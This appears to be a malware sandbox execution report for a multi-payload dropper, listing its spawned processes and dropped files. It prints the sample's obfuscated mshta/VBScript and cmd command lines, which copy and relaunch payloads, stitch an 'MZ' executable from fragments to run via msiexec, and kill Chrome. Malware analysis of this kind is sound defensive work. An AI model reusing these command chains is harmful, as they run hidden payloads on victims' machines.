Thu12b275ee70c7e913.exe

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12493eba7a.exe

Thu12493eba7a.exe

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu120bfbc2443b3b5d.exe

Thu120bfbc2443b3b5d.exe

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe

Thu125e541847539.exe

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu124078ed79bdbd5.exe

Thu124078ed79bdbd5.exe

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12912263469836d.exe

Thu12912263469836d.exe

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe

Thu1231d30cda84872.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIPT: Close ( creATeoBjEct ( "wscRiPT.sHElL"). RUn ( "cmD.exe /q /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12493eba7a.exe"" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If """" == """" for %Q In ( ""C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12493eba7a.exe"" ) do taskkill -f -Im ""%~nXQ"" " , 0, TRue ) )

C:\Users\Admin\AppData\Local\Temp\is-VPJ0P.tmp\Thu125e541847539.tmp

"C:\Users\Admin\AppData\Local\Temp\is-VPJ0P.tmp\Thu125e541847539.tmp" /SL5="$301C6,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2136 -s 484

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /q /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12493eba7a.exe" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If "" == "" for %Q In ( "C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12493eba7a.exe" ) do taskkill -f -Im "%~nXQ"

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe

"C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-8FFJH.tmp\Thu125e541847539.tmp

"C:\Users\Admin\AppData\Local\Temp\is-8FFJH.tmp\Thu125e541847539.tmp" /SL5="$9018A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe

yDhNY.exe /pFKkSWJQc5v2ppVFMo

C:\Windows\SysWOW64\taskkill.exe

taskkill -f -Im "Thu12493eba7a.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIPT: Close ( creATeoBjEct ( "wscRiPT.sHElL"). RUn ( "cmD.exe /q /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe"" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If ""/pFKkSWJQc5v2ppVFMo "" == """" for %Q In ( ""C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe"" ) do taskkill -f -Im ""%~nXQ"" " , 0, TRue ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /q /c copY /Y "C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If "/pFKkSWJQc5v2ppVFMo " == "" for %Q In ( "C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe" ) do taskkill -f -Im "%~nXQ"

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu126011caea28.exe

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu126011caea28.exe

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu128b511c77e8c.exe

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu128b511c77e8c.exe

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12912263469836d.exe

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12912263469836d.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBSCRiPT: cLoSe (CREATeOBJEcT ( "WScRIPt.SHEll" ). rUN ( "C:\Windows\system32\cmd.exe /Q /R eCHo | set /P = ""MZ"" > 1FRnX.N & CopY /b /y 1FRNX.N+ XGUd2JE.9Ck + DeMa.eP+ y~A7GJIO.E + 6Q6HY.Re ISA502G.S7 & stART msiexec.exe -Y .\ISA502G.S7 " , 0 ,trUE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /Q /R eCHo | set /P = "MZ" >1FRnX.N & CopY /b /y 1FRNX.N+ XGUd2JE.9Ck + DeMa.eP+ y~A7GJIO.E + 6Q6HY.Re ISA502G.S7 & stART msiexec.exe -Y .\ISA502G.S7

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>1FRnX.N"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe -Y .\ISA502G.S7

Network

Files

\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\libwinpthread-1.dll

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\libcurlpp.dll

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\libcurl.dll

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\libgcc_s_dw2-1.dll

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\libstdc++-6.dll

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu128b511c77e8c.exe

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu124078ed79bdbd5.exe

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu126011caea28.exe

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu123e05ebe43921.exe

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1262fd911d3e6320.exe

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu120bfbc2443b3b5d.exe

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12465fe68f85b6156.exe

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12b275ee70c7e913.exe

\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu122f7469b214cb59.exe

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12ca1c119bc29.exe

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12493eba7a.exe

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12912263469836d.exe

C:\Users\Admin\AppData\Local\Temp\is-8FFJH.tmp\Thu125e541847539.tmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KVI8WOM8Z2NW81M0H5E0.temp

C:\Users\Admin\AppData\Local\Temp\is-TM4GU.tmp\_isetup\_shfoldr.dll

C:\Users\Admin\AppData\Local\Temp\is-TM4GU.tmp\idp.dll
